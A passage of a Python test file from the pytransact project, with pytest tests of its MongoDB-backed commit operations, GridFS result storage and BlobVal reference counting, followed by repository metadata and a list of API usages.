= self.newcontext()\n with ctx1:\n toi1 = blm.testcommit.Test._query(id=toi.id).run()[0]\n op = commit.DeleteToi(toi1)\n\n toi._delete()\n 
self.commit()\n\n interested = ObjectId()\n ctx1.runCommit([op], interested=interested)\n\n result, error = commit.wait_for_commit(self.database, interested)\n assert not error # It was already gone, so we are ok.\n\n\nclass TestOperations(BaseCommitContextTests):\n\n def test_CreateToi(self):\n toid = ObjectId()\n op = commit.CreateToi('testcommit.Test', toid, {'name': ['test']})\n cctx = self.newcontext()\n toi = op.operate(cctx)\n assert not toi._phantom\n\n def test_CallToi_simple(self):\n toi = blm.testcommit.Test(name=['test'])\n self.sync()\n cctx = self.newcontext()\n\n op = commit.CallToi(toi.id[0], 'simple', [['bar']])\n commitDoc = cctx.runCommit([op])\n result = commitDoc.results\n\n assert result == [['test', 'bar']]\n\n def test_CallBlm_simple(self):\n cctx = self.newcontext()\n\n op = commit.CallBlm('testcommit', 'simple', [['bar']])\n commitDoc = cctx.runCommit([op])\n result = commitDoc.results\n\n assert result == [['foo', 'bar']]\n\n def test_CallBlm_write(self):\n user = blm.fundamental.AccessHolder()\n toi = blm.testcommit.Test(name=['foo'], allowRead=[user])\n self.commit()\n self.sync()\n cctx = self.newcontext(user=user)\n\n op = commit.CallBlm('testcommit', 'write', [[toi], ['bar']])\n cmt = cctx.runCommit([op])\n # xxx find a better way of testing this\n assert 'AttrPermError' in repr(cmt.error)\n\n def test_CallBlm_non_existant_toiref(self):\n op = commit.CallBlm('testcommit', 'write', [[ObjectId()], ['bar']])\n cctx = self.newcontext()\n print(py.test.raises(ClientError, op.operate, cctx))\n\n def test_BlobVals(self):\n val = BlobVal('foo')\n op = commit.CallToi(ObjectId(), 'foo', [[val], ['apa']])\n assert set(op.blobVals()) == {val}\n\n op = commit.CallBlm('theblm', 'foo', [[val], ['apa']])\n assert set(op.blobVals()) == {val}\n\n def test_serialization(self):\n op = commit.DeleteToi(None)\n data = {'op': op}\n son = bson.BSON.encode(data)\n decoded = son.decode()\n assert decoded == data\n\nclass TestCommitObject(BaseCommitContextTests):\n def test_attributes(self):\n c = commit.Commit()\n assert isinstance(c._id, ObjectId)\n assert c.user == None\n assert c.interested == None\n assert c.handled_by == None\n assert c.operations == []\n assert c.newTois == []\n assert c.changedTois == []\n assert c.deletedTois == []\n assert c.addedBlobVals == {}\n assert c.deletedBlobVals == {}\n assert c.indexData == []\n assert c.results == []\n assert c.error == None\n assert c.traceback == None\n assert c.state == 'new'\n assert c.generation == 0\n\n def test_get_doc(self):\n c = commit.Commit()\n result = c.get_doc()\n expected = {\n '_id': c._id,\n 'user': None,\n 'interested': None,\n 'error': None,\n 'traceback': None,\n 'state': 'new',\n 'generation': 0\n }\n assert result == expected\n\n def test_save(self):\n c = commit.Commit()\n c.save(self.database)\n self.sync()\n result = self.find_one({'_id': c._id}, self.database.commits)\n expect = c.get_doc()\n assert result == expect\n\n def test_save_gridfs(self):\n resstr = 'random string'*24*2**10\n c1 = commit.Commit(results = [resstr])\n c1.save(self.database)\n self.sync()\n result = self.find_one({'_id': c1._id}, self.database.commits)\n gridfile = result['_griddata']\n assert isinstance(gridfile, BlobVal)\n assert isinstance(gridfile.value, gridfs.GridOut)\n c2 = commit.Commit.fromdoc(self.database, result)\n assert c2.results == [resstr]\n\n def test_delete(self):\n class Op(object):\n def __init__(self, blobs):\n self.blobs = blobs\n\n def blobVals(self):\n return self.blobs\n\n c = commit.Commit()\n added = 
BlobVal('added')\n deleted = BlobVal('deleted')\n opval = BlobVal('op')\n added.addref(c._id)\n deleted.addref(c._id)\n opval.addref(c._id)\n result = BlobVal('result')\n result.addref(c._id)\n\n ops = [ Op([opval]) ]\n\n c.results = [ result ]\n c.addedBlobVals = { 'a' : [added] }\n c.deletedBlobVals = { 'b' : [deleted] }\n c.save(self.database)\n self.sync()\n\n assert self.find_one({'_id': c._id}, self.database.commits)\n c.operations = ops # Not BSONable\n c.delete(self.database)\n self.sync()\n assert not self.find_one({'_id': c._id}, self.database.commits)\n assert added.references == set()\n assert deleted.references == set()\n assert ops[0].blobs[0].references == set()\n assert result.references == set()\n\n def test_delete_gridfs(self):\n c = commit.Commit(results=['foo bar baz'*24*2**10])\n doc = c.get_doc()\n blobval = doc['_griddata']\n c.save(self.database)\n self.sync()\n assert self.find_one({'_id': c._id}, self.database.commits)\n assert self.find_one({'metadata.references.value': c._id},\n self.database.blobvals.files)\n\n c.delete(self.database)\n self.sync()\n\n assert not self.find_one({'_id': c._id}, self.database.commits)\n assert not self.find_one({'metadata.references.value': c._id},\n self.database.blobvals.files)\n # Make sure that ALL generated blobvals get decref()'d\n assert blobval.references == set()\n\n\n def test_unhandle(self):\n handler = ObjectId()\n c = commit.Commit(handled_by=handler)\n c.unhandle(self.database, handler)\n self.sync()\n\n cdoc = self.find_one({'_id': c._id}, self.database.commits)\n assert 'handled_by' not in cdoc\n\n def test_unhandle_handled(self):\n handler = ObjectId()\n c1 = commit.Commit(handled_by=handler)\n c1.save(self.database)\n c1.unhandle_handled(self.database, c1._id, handler)\n self.sync()\n assert self.find_one({'_id': c1._id}, self.database.commits)\n\n c2 = commit.Commit(handled_by=handler)\n # c1 is intentional. 
Ensure c2 isn't saved in any form\n c1.unhandle_handled(self.database, c2._id, handler)\n c2.unhandle_handled(self.database, c2._id, handler)\n self.sync()\n assert not self.find_one({'_id': c2._id}, self.database.commits)\n\n def test_handlers_running(self):\n self.set_primary()\n handler = ObjectId()\n c = commit.Commit(handled_by=handler)\n c.save(self.database)\n\n assert c.handlers_running(self.database)\n c.unhandle(self.database, handler)\n\n assert not c.handlers_running(self.database)\n\n def test_handle(self):\n handler = ObjectId()\n c1 = commit.Commit()\n c1.save(self.database)\n expected = c1.get_doc()\n expected['handled_by'] = handler\n\n c2 = commit.Commit.handle(self.database, handler)\n assert c2.get_doc() == expected\n\n c3 = commit.Commit.handle(self.database, handler)\n assert c3 is None\n\n def test_done(self):\n c = commit.Commit(interested='interested')\n result = BlobVal('result')\n c.results = [result]\n c.newTois = {'a': 'b'}\n c.done(self.database)\n self.sync()\n\n assert result.references == {c._id}\n result = self.find_one({'_id': c._id}, self.database.commits)\n expect = {'_id': c._id,\n 'error': None,\n 'handled_by': 'interested',\n 'interested': 'interested',\n 'results': c.results,\n 'state': 'done'}\n assert result == expect\n\n def test_done_not_interested(self):\n c = commit.Commit()\n result = BlobVal('result')\n c.results = [result]\n c.newTois = {'a': 'b'}\n c.done(self.database)\n\n assert result.references == set()\n result = self.find_one({'_id': c._id}, self.database.commits)\n assert not result\n\n def test_fromdoc(self):\n _id = ObjectId()\n c = commit.Commit.fromdoc(self.database, {'_id': _id,\n 'results': ['foo']})\n assert c._id == _id\n assert c.results == ['foo']\n\n def test_fromquery(self):\n handler = ObjectId()\n c1 = commit.Commit(handled_by=handler)\n c1.save(self.database)\n self.sync()\n c2 = commit.Commit.fromquery(self.database, {'handled_by': handler})\n assert c1._id == c2._id\n", "repo_name": "jacob22/pytransact", "sub_path": "pytransact/test/test_commit.py", "file_name": "test_commit.py", "file_ext": "py", "file_size_in_byte": 46541, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "blm.addBlmPath", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 16, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 19, "usage_type": "call"}, {"api_name": "pytransact.commit.log.setLevel", "line_number": 20, "usage_type": "call"}, {"api_name": "pytransact.commit.log", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 20, "usage_type": "name"}, {"api_name": "logging.DEBUG", "line_number": 20, "usage_type": "attribute"}, {"api_name": "blm.removeBlmPath", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 23, "usage_type": "call"}, {"api_name": "blm.clear", "line_number": 24, "usage_type": "call"}, {"api_name": "pytransact.testsupport.ContextTests", "line_number": 27, "usage_type": "name"}, {"api_name": "pytransact.testsupport.RuntimeContext", "line_number": 31, "usage_type": "call"}, {"api_name": "blm.fundamental.AccessHolder", 
"line_number": 32, "usage_type": "call"}, {"api_name": "blm.fundamental", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pytransact.commit.CommitContext", "line_number": 38, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 38, "usage_type": "name"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 40, "usage_type": "call"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 44, "usage_type": "call"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 46, "usage_type": "call"}, {"api_name": "pymongo.ReadPreference", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pytransact.mongo.find", "line_number": 56, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 56, "usage_type": "name"}, {"api_name": "pytransact.mongo.find_one", "line_number": 60, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 60, "usage_type": "name"}, {"api_name": "pytransact.commit.wait_for_commit", "line_number": 67, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 67, "usage_type": "name"}, {"api_name": "py.test.raises", "line_number": 73, "usage_type": "call"}, {"api_name": "py.test", "line_number": 73, "usage_type": "attribute"}, {"api_name": "pytransact.commit.Timeout", "line_number": 73, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 73, "usage_type": "name"}, {"api_name": "pytransact.commit.wait_for_commit", "line_number": 73, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 78, "usage_type": "call"}, {"api_name": "py.test", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pytransact.commit.wait_for_commit", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 78, "usage_type": "name"}, {"api_name": "pytransact.commit.CommitContext", "line_number": 83, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 83, "usage_type": "name"}, {"api_name": "blm.testcommit", "line_number": 87, "usage_type": "attribute"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 94, "usage_type": "call"}, {"api_name": "blm.fundamental.AccessHolder", "line_number": 99, "usage_type": "call"}, {"api_name": "blm.fundamental", "line_number": 99, "usage_type": "attribute"}, {"api_name": "blm.testcommit", "line_number": 101, "usage_type": "attribute"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 108, "usage_type": "call"}, {"api_name": "blm.testcommit.Test", "line_number": 113, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 113, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 118, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 118, "usage_type": "attribute"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 128, "usage_type": "call"}, {"api_name": "blm.testcommit.Test", "line_number": 135, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 135, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 140, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 140, "usage_type": "attribute"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 152, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 153, "usage_type": "name"}, {"api_name": "pytransact.commit.state", "line_number": 154, "usage_type": 
"attribute"}, {"api_name": "pytransact.commit", "line_number": 154, "usage_type": "name"}, {"api_name": "blm.testcommit.Test", "line_number": 160, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 160, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 165, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 165, "usage_type": "attribute"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 172, "usage_type": "call"}, {"api_name": "blm.testcommit.Test", "line_number": 181, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 181, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 185, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 185, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 190, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 190, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 191, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 191, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 194, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 194, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 195, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 195, "usage_type": "attribute"}, {"api_name": "blm.fundamental.AccessHolder._query", "line_number": 202, "usage_type": "call"}, {"api_name": "blm.fundamental", "line_number": 202, "usage_type": "attribute"}, {"api_name": "blm.fundamental", "line_number": 203, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 206, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 206, "usage_type": "attribute"}, {"api_name": "blm.testcommit", "line_number": 207, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 213, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 213, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 216, "usage_type": "call"}, {"api_name": "py.test", "line_number": 216, "usage_type": "attribute"}, {"api_name": "py.test.skip", "line_number": 219, "usage_type": "call"}, {"api_name": "py.test", "line_number": 219, "usage_type": "attribute"}, {"api_name": "blm.testcommit.RestTest", "line_number": 224, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 224, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 228, "usage_type": "call"}, {"api_name": "py.test", "line_number": 228, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 230, "usage_type": "call"}, {"api_name": "py.test", "line_number": 230, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 234, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 234, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 237, "usage_type": "call"}, {"api_name": "py.test", "line_number": 237, "usage_type": "attribute"}, {"api_name": "blm.testcommit", "line_number": 238, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 240, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 240, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 241, "usage_type": "call"}, {"api_name": "py.test", "line_number": 241, "usage_type": 
"attribute"}, {"api_name": "blm.testcommit", "line_number": 242, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 245, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 245, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 248, "usage_type": "call"}, {"api_name": "py.test", "line_number": 248, "usage_type": "attribute"}, {"api_name": "blm.testcommit", "line_number": 249, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 251, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 251, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 252, "usage_type": "call"}, {"api_name": "py.test", "line_number": 252, "usage_type": "attribute"}, {"api_name": "blm.testcommit", "line_number": 253, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 256, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 256, "usage_type": "attribute"}, {"api_name": "blm.testcommit", "line_number": 260, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 264, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 264, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 268, "usage_type": "call"}, {"api_name": "py.test", "line_number": 268, "usage_type": "attribute"}, {"api_name": "blm.testcommit", "line_number": 269, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 275, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 275, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 276, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 276, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 277, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 277, "usage_type": "attribute"}, {"api_name": "blm.testcommit", "line_number": 281, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 286, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 286, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 290, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 290, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 292, "usage_type": "call"}, {"api_name": "py.test", "line_number": 292, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 302, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 302, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 304, "usage_type": "call"}, {"api_name": "py.test", "line_number": 304, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 314, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 314, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 315, "usage_type": "call"}, {"api_name": "py.test", "line_number": 315, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 325, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 325, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._create", "line_number": 326, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 326, "usage_type": "attribute"}, {"api_name": "bson.objectid.ObjectId", "line_number": 326, "usage_type": "call"}, {"api_name": 
"py.test.raises", "line_number": 332, "usage_type": "call"}, {"api_name": "py.test", "line_number": 332, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 338, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 338, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Other", "line_number": 339, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 339, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 340, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 340, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 343, "usage_type": "call"}, {"api_name": "py.test", "line_number": 343, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 347, "usage_type": "call"}, {"api_name": "py.test", "line_number": 347, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 350, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 350, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Other._query", "line_number": 351, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 351, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 362, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 362, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 363, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 363, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Other", "line_number": 373, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 373, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Related", "line_number": 374, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 374, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Other", "line_number": 380, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 380, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Related", "line_number": 381, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 381, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Other._query", "line_number": 387, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 387, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Related._query", "line_number": 389, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 389, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Related", "line_number": 391, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 391, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Other._query", "line_number": 395, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 395, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Related._query", "line_number": 398, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 398, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Other._query", "line_number": 402, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 402, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Related._query", "line_number": 405, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 405, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Other._query", "line_number": 411, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 411, "usage_type": "attribute"}, {"api_name": 
"blm.testcommit.Related._query", "line_number": 414, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 414, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Other._query", "line_number": 420, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 420, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Other", "line_number": 425, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 425, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Related", "line_number": 426, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 426, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Other._query", "line_number": 429, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 429, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Related._query", "line_number": 432, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 432, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Other._query", "line_number": 437, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 437, "usage_type": "attribute"}, {"api_name": "blm.testcommit.OtherWeak", "line_number": 441, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 441, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Related", "line_number": 442, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 442, "usage_type": "attribute"}, {"api_name": "blm.testcommit.OtherWeak._query", "line_number": 445, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 445, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Related._query", "line_number": 448, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 448, "usage_type": "attribute"}, {"api_name": "blm.testcommit.OtherWeak._query", "line_number": 452, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 452, "usage_type": "attribute"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 457, "usage_type": "call"}, {"api_name": "blm.testcommit.Test", "line_number": 459, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 459, "usage_type": "attribute"}, {"api_name": "bson.objectid.ObjectId", "line_number": 466, "usage_type": "call"}, {"api_name": "blm.testcommit.Test._query", "line_number": 470, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 470, "usage_type": "attribute"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 473, "usage_type": "call"}, {"api_name": "blm.testcommit.Test._query", "line_number": 484, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 484, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 493, "usage_type": "call"}, {"api_name": "py.test", "line_number": 493, "usage_type": "attribute"}, {"api_name": "gridfs.GridFS", "line_number": 493, "usage_type": "call"}, {"api_name": "py.test.xfail", "line_number": 497, "usage_type": "call"}, {"api_name": "py.test", "line_number": 497, "usage_type": "attribute"}, {"api_name": "pytransact.commit.OperateBase", "line_number": 502, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 502, "usage_type": "name"}, {"api_name": "pytransact.commit.CommitContext", "line_number": 508, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 508, "usage_type": "name"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 509, "usage_type": "call"}, {"api_name": 
"py.test.xfail", "line_number": 517, "usage_type": "call"}, {"api_name": "py.test", "line_number": 517, "usage_type": "attribute"}, {"api_name": "pytransact.commit.OperateBase", "line_number": 525, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 525, "usage_type": "name"}, {"api_name": "pytransact.commit.CommitContext", "line_number": 532, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 532, "usage_type": "name"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 533, "usage_type": "call"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 550, "usage_type": "call"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 554, "usage_type": "call"}, {"api_name": "pytransact.commit.CallBlm", "line_number": 563, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 563, "usage_type": "name"}, {"api_name": "pytransact.commit.CallBlm", "line_number": 568, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 568, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 576, "usage_type": "call"}, {"api_name": "pytransact.commit.CallBlm", "line_number": 579, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 579, "usage_type": "name"}, {"api_name": "pytransact.commit.CallBlm", "line_number": 584, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 584, "usage_type": "name"}, {"api_name": "pytransact.commit.CallBlm", "line_number": 590, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 590, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 592, "usage_type": "call"}, {"api_name": "pytransact.mongo.find_one", "line_number": 596, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 596, "usage_type": "name"}, {"api_name": "blm.testcommit.Test", "line_number": 602, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 602, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 603, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 603, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 604, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 604, "usage_type": "attribute"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 612, "usage_type": "call"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 613, "usage_type": "call"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 614, "usage_type": "call"}, {"api_name": "pytransact.commit.CallBlm", "line_number": 619, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 619, "usage_type": "name"}, {"api_name": "pytransact.difftoi.DiffTOI", "line_number": 625, "usage_type": "call"}, {"api_name": "pytransact.difftoi.DiffTOI", "line_number": 629, "usage_type": "call"}, {"api_name": "blm.testcommit.Test", "line_number": 648, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 648, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 649, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 649, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 650, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 650, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 661, "usage_type": "name"}, 
{"api_name": "pytransact.commit.newTois", "line_number": 662, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 662, "usage_type": "name"}, {"api_name": "pytransact.commit.changedTois", "line_number": 663, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 663, "usage_type": "name"}, {"api_name": "pytransact.commit.deletedTois", "line_number": 664, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 664, "usage_type": "name"}, {"api_name": "pytransact.commit.indexData", "line_number": 665, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 665, "usage_type": "name"}, {"api_name": "pytransact.commit.results", "line_number": 666, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 666, "usage_type": "name"}, {"api_name": "pytransact.commit.error", "line_number": 667, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 667, "usage_type": "name"}, {"api_name": "blm.testcommit.Test", "line_number": 671, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 671, "usage_type": "attribute"}, {"api_name": "pytransact.commit.CallBlm", "line_number": 674, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 674, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 680, "usage_type": "call"}, {"api_name": "blm.testcommit.Test", "line_number": 682, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 682, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 683, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 683, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 685, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 685, "usage_type": "attribute"}, {"api_name": "pytransact.difftoi.DiffTOI", "line_number": 687, "usage_type": "call"}, {"api_name": "pytransact.difftoi.DiffTOI", "line_number": 690, "usage_type": "call"}, {"api_name": "pytransact.mongo.insert", "line_number": 706, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 706, "usage_type": "name"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 709, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit.fromquery", 